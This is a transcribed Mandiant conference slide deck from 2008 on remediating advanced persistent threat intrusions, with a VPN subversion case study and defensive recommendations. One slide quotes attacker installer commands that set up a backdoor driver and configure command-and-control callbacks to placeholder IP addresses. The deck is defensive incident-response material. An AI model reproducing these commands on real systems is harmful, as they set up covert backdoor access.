All Information is derived from Mandiant consulting in a non-classified environment.



Similar documents
Critical Security Controls

Comprehensive Malware Detection with SecurityCenter Continuous View and Nessus. February 3, 2015 (Revision 4)

Targeted Intrusion Remediation: Lessons From The Front Lines. Jim Aldridge

24/7 Visibility into Advanced Malware on Networks and Endpoints

CHAPTER 3 : INCIDENT RESPONSE FIVE KEY RECOMMENDATIONS GLOBAL THREAT INTELLIGENCE REPORT 2015 :: COPYRIGHT 2015 NTT INNOVATION INSTITUTE 1 LLC

How To Manage Security On A Networked Computer System

How We're Getting Creamed

Guideline on Auditing and Log Management

5 Steps to Advanced Threat Protection

Symantec Cyber Threat Analysis Program Program Overview. Symantec Cyber Threat Analysis Program Team

CS 356 Lecture 25 and 26 Operating System Security. Spring 2013

Persistence Mechanisms as Indicators of Compromise

Sygate Secure Enterprise and Alcatel

Advanced Threats: The New World Order

GFI White Paper PCI-DSS compliance and GFI Software products

Software that provides secure access to technology, everywhere.

Defence Cyber Protection Partnership Cyber Risks Profile Requirements

Seven Strategies to Defend ICSs

Defending Against Data Beaches: Internal Controls for Cybersecurity

Larry Wilson Version 1.0 November, University Cyber-security Program Critical Asset Mapping

GOOD GUYS VS BAD GUYS: USING BIG DATA TO COUNTERACT ADVANCED THREATS. Joe Goldberg. Splunk. Session ID: SPO-W09 Session Classification: Intermediate

Chapter 9 Firewalls and Intrusion Prevention Systems

Effective Threat Management. Building a complete lifecycle to manage enterprise threats.

Hunting for Indicators of Compromise

Cybersecurity: An Innovative Approach to Advanced Persistent Threats

Additional Security Considerations and Controls for Virtual Private Networks

A host-based firewall can be used in addition to a network-based firewall to provide multiple layers of protection.

Enterprise Cybersecurity Best Practices Part Number MAN Revision 006

Evolving Threat Landscape

WildFire. Preparing for Modern Network Attacks

Enterprise Cybersecurity: Building an Effective Defense

Section 12 MUST BE COMPLETED BY: 4/22

Effective Methods to Detect Current Security Threats

Larry Wilson Version 1.0 November, University Cyber-security Program Controls Book

Windows Server 2003 End of Support. What does it mean? What are my options?

Protecting Your Organisation from Targeted Cyber Intrusion

Effective Methods to Detect Current Security Threats

Host/Platform Security. Module 11

SANS Top 20 Critical Controls for Effective Cyber Defense

Beyond 'Check The Box': Powering Intrusion Investigations Jim Aldridge 11 March 2014

Obtaining Enterprise Cybersituational

Global ediscovery Client Data Security. Managed technology for the global legal profession

PCI Assessments 3.0 What Will the Future Bring? Matt Halbleib, SecurityMetrics

JK0 015 CompTIA E2C Security+ (2008 Edition) Exam

Advanced Persistent Threats

SECURITY ANALYTICS MOVES TO REAL-TIME PROTECTION

Security Analytics for Smart Grid

RSA Security Anatomy of an Attack Lessons learned

The Cyber OODA Loop: How Your Attacker Should Help You Design Your Defense. Tony Sager The Center for Internet Security

The Protection Mission a constant endeavor

Separating Signal from Noise: Taking Threat Intelligence to the Next Level

2. From a control perspective, the PRIMARY objective of classifying information assets is to:

LogRhythm and PCI Compliance

Lessons from the DHS Cyber Test Bed Project

EITC Lessons Learned: Building Our Internal Security Intelligence Capability

CS 356 Lecture 19 and 20 Firewalls and Intrusion Prevention. Spring 2013

Staying Secure After Microsoft Windows Server 2003 Reaches End of Life. Trevor Richmond, Sales Engineer Trend Micro

Cybersecurity Health Check At A Glance

Top Ten Cyber Threats

Driving Company Security is Challenging. Centralized Management Makes it Simple.

Industrial Security for Process Automation

One-Man Shop. How to build a functional security program with limited resources DEF CON 22

Active Response: Automated Risk Reduction or Manual Action?

Company Co. Inc. LLC. LAN Domain Network Security Best Practices. An integrated approach to securing Company Co. Inc.

BUILDING A SECURITY OPERATION CENTER (SOC) ACI-BIT Vancouver, BC. Los Angeles World Airports

G/On. Basic Best Practice Reference Guide Version 6. For Public Use. Make Connectivity Easy

INCIDENT RESPONSE CHECKLIST

End-user Security Analytics Strengthens Protection with ArcSight

Utility Modernization Cyber Security City of Glendale, California

An Analysis of the Capabilities Of Cybersecurity Defense

APT Advanced Persistent Threat Time to rethink?

Security Event Management. February 7, 2007 (Revision 5)

Cyber Risk Mitigation via Security Monitoring. Enhanced by Managed Services

Advanced Visibility. Moving Beyond a Log Centric View. Matthew Gardiner, RSA & Richard Nichols, RSA

13 Ways Through A Firewall

How To Achieve Pca Compliance With Redhat Enterprise Linux

PALANTIR CYBER An End-to-End Cyber Intelligence Platform for Analysis & Knowledge Management

Beyond Check The Box

CITY UNIVERSITY OF HONG KONG Network and Platform Security Standard

MITIGATING LARGE MERCHANT DATA BREACHES

Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis?

Towards End-to-End Security

The Role of Security Monitoring & SIEM in Risk Management

13 Ways Through A Firewall What you don t know will hurt you

Achieving PCI-Compliance through Cyberoam

Configuring Personal Firewalls and Understanding IDS. Securing Networks Chapter 3 Part 2 of 4 CA M S Mehta, FCA

Practice Good Enterprise Security Management. Presented by Laurence CHAN, MTR Corporation Limited

TASK TDSP Web Portal Project Cyber Security Standards Best Practices

74% 96 Action Items. Compliance

Memory Forensics & Security Analytics: Detecting Unknown Malware

2012 Data Breach Investigations Report

05 June 2015 A MW TLP: GREEN

Cyber - Security and Investigations. Ingrid Beierly August 18, 2008

Sophisticated Indicators for the Modern Threat Landscape: An Introduction to OpenIOC

Introduction. Jason Lawrence, MSISA, CISSP, CISA Manager, EY Advanced Security Center Atlanta, Georgia

Innovations in Network Security

Security Controls Implementation Plan

Strategies to Mitigate Targeted Cyber Intrusions Mitigation Details

Security Controls for the Autodesk 360 Managed Services

How Do Threat Actors Move Deeper Into Your Network?

Transcription:

Disclaimer: All Information is derived from Mandiant consulting in a non-classified environment. Case Studies are representative of industry trends and have been derived from multiple client engagements. 1

Slaying the Red Dragon: Remediating the China Cyber Threat Presented to: SANS Forensic Summit October 14, 2008 Ken Bradley & Wendi Rafferty ken.bradley@mandiant.com wendi.rafferty@mandiant.com

Overview Who is Mandiant? VPN Subversion Case Study How to Win the Fight Against the Advanced Persistent Threat (APT) Even though we re talking about the APT today, these same strategies will work with tomorrow s threat. 3

Who is Mandiant? Consultants, authors, instructors and security experts We have investigated the Advanced Persistent Threat in Federal and Commercial enterprise networks for over eight years We have reverse engineered the latest techniques used by the APT attackers and briefed the DoD on them We can help find evil and solve crime: whether it is APT-related or not 4

Who Are We? Ken Principal Consultant Investigates Commercial APT Intrusions AFOSI Technical Monitoring Team Wendi Director of Federal Services Investigates Federal APT Intrusions AFOSI Computer Crime Investigator 5

VPN Subversion Attack Case Study

Once Upon a Time We were onsite during an engagement Identified several malware families resident The attackers were using simple outbound connections for reverse shells We blocked these connections through the firewall & DNS The attackers developed proxy-aware malware & stopped using DNS: This allowed them to bypass the firewall & DNS blocks The proxies were not monitored initially We identified their traffic patterns on the proxies & responded to the infected hosts 7

Playing the Game of Whack-a-mole We continued to identify infected hosts by devising an enterprise - wide host based detection system A cycle of response & containment continued for an extended period of time Then, their network traffic seemed to vanish, but we were still identifying hosts with the known malware... 8

Where Did They Go? Two possible explanations: The attackers completely stopped activity The attackers were using covert channels 9

VPN s are safe. Right? (gulp) Remote Employees Bad Guys Internet Cloud Untrusted Proxy Firewall Monitoring Trusted VPN Internal Network Malware 10

Setting Up VPN Subversion The attacker: 1. Establishes a foothold on the network 2. Steals credentials 3. Propagates the malware to multiple systems Installer installs and configures backdoor and driver Backdoor interacts with driver and external C2 server Subversion Driver subverts DNE2000.sys installer.exe -id evil_driver backdoor.sys net start evil_driver installer.exe -cd evil_driver O 125.125.125.125 installer.exe -in c:\windows\system32\sens.dll backdoor.dll 1 installer.exe -cc 20 9999 123.123.123.123 3454 219 installer -cc -m 00F1E1C1343D 192.168.1.1 11

Lessons Learned: How to Win the Fight

First Things First: Your network must become: 1. Defensible Know the content of your network Know where your network begins and ends 2. Hostile Must be as difficult as possible for an attacker to compromise and reside in 3. Fertile Network should be a breeding ground of forensic and investigative data Logs/backups/traffic captures/baseline data There is no one silver bullet - you must develop a series of tactical & strategic mitigation activities 13

Make it Defensible

Defensible You need near-realtime access to: Active Directory DHCP VPN Web Proxy IDS/IPS Firewall/Router ACL HIDS/HIPS Antivirus Server Event Logs Workstation Event Logs Software Management Vulnerability Scans 15

Defensible Know the contents of your network Know where your network begins and ends Know where accounts authenticate Ensure network is segmented into a DMZ and internal infrastructure Where there is a firewall, there should also be an IDS and network monitoring Deploy standardized software and hardware throughout the enterprise 16

Defensible Have a mechanism for developing host and networkbased indicators through reverse engineering of malware not just plugging files into an automated repository Be able to search all hosts on your network for the specific indicators you developed Mandiant Intelligent Response (MIR) Complete this cycle within a matter of hours 17

Creating Processes No, Not that Process Establish Tracking of Indicators: Develop a Formal Process for Tracking Host and Network Based Indicators Ensure there is a mechanism for distributing & implementing searches for the indicators throughout the organization Establish Repository for Reports 18

Develop a Formal Repository of Indicators Number Description Details Source Notes HBI-001 Registry Setting HKLM\SYSTEM\CurrentC ontrolset\helloworld\ Reverse engineerin g of helloworld. exe, provided by outside source. HBI-002 Filename goodbye.exe Provided by outside source.. This registry key is created as a by-product of the installation of a service named helloworld. This malware is associated with the use of the helloworld.exe and helloworld.zip malware tool. If this key is found, it is likely that helloworld.exe was executed on the system. A primary function of helloworld.exe is to dump password hashes. Reverse engineering shows that goodbye.exe is associated with HBI-001. HBI-003 MD5 Hash fffffffaba42108a9d3a3d1 38a9aaaaaa Provided by outside source. Mandiant calculated the MD5 hash of the goodbye.exe executable provided by a third party. 19

Establishing a Formal Reporting Methodology Establish Formal Reporting Forensic Reports Classification and Prioritization of Indicators Standardized Tables and Figures Standardized Host and Network-Based Indicators Allows for portability throughout organization and various databases, search schemas, etc Malware Analysis Reports Numbering sequence that feeds back into your repository Remediation Step Tracking These steps aren t revolutionary. But establishing a repeatable process to complete them in record time is! 20

Make it Hostile

Hostile Must be as difficult as possible for an attacker to compromise and reside in your network Baseline network traffic to perform comparative analysis Whitelist good activity and deny the rest Network activity Application behavior Do not allow public facing devices to connect directly to internal domain controllers Limit administrative privileges to users Develop data collection and analysis guidelines that assist in decreasing time the attackers operate undetected 22

Initial Data Collection Timeframe Activity Activity Begins Completion Live Data Collection Under 4 hours 4 Hours Disk Duplication Under 4 hours 2 Days IDS Log Collection Under 2 hours 4 Hours Active Directory Log Collection Under 2 hours 4 Hours Anti-Virus Log Collection Under 2 Hours 4 Hours Firewall Log Collection Under 2 hours 4 Hours 23

Desired Data Analysis Timeframe Activity Confirm Compromise In-Depth Inspection Review Live Data Under 1 hour 4 Hours Review Forensic Images Under 4 hours 2-3 Days Review IDS Logs Review Active Directory Logs Requires Known Indicators/ Custom Signatures Requires Known Indicators (Normal Logon Behavior) Real-Time Alerting Unknown Review Firewall Logs Requires Known Indicators Unknown 24

Make it Fertile

Fertile Network should be a breeding ground of forensic and investigative data: 1. Proxy logs 2. Authentication logs 3. IDS alerts 4. Host-based logs 5. Firewall logs 6. Full content traffic captures 7. Netflow Ensure this data is standardized throughout the enterprise That whole near-realtime access thing 26

How do we solve that VPN problem?

VPN Subversion Mitigation Recommendations: Baseline the VPN traffic to perform comparative analysis to determine traffic spikes Employ portable hardware host based firewalls to prevent split-tunneling through hosts Employ good segmentation! Why is an attacker that is able to compromise a user s system able to touch Domain Controllers on any port other than 88 (Kerberos) Use ACL d VLANs for major segments and personal firewalls on all clients to prevent client -> client communication 28

Summary VPN Subversion Case Study How to Win the Fight Against the Advanced Persistent Threat 29

Questions ken.bradley@mandiant.com wendi.rafferty@mandiant.com 30

Contact Information Washington, DC 675 N. Washington Street Suite 210 Alexandria, VA 22324 (703) 683-3141 (800) 647-7020 New York 1285 Avenue of the Americas 35 th Floor New York, NY 10019 Los Angeles 400 Continental Blvd El Segundo, CA 90245 31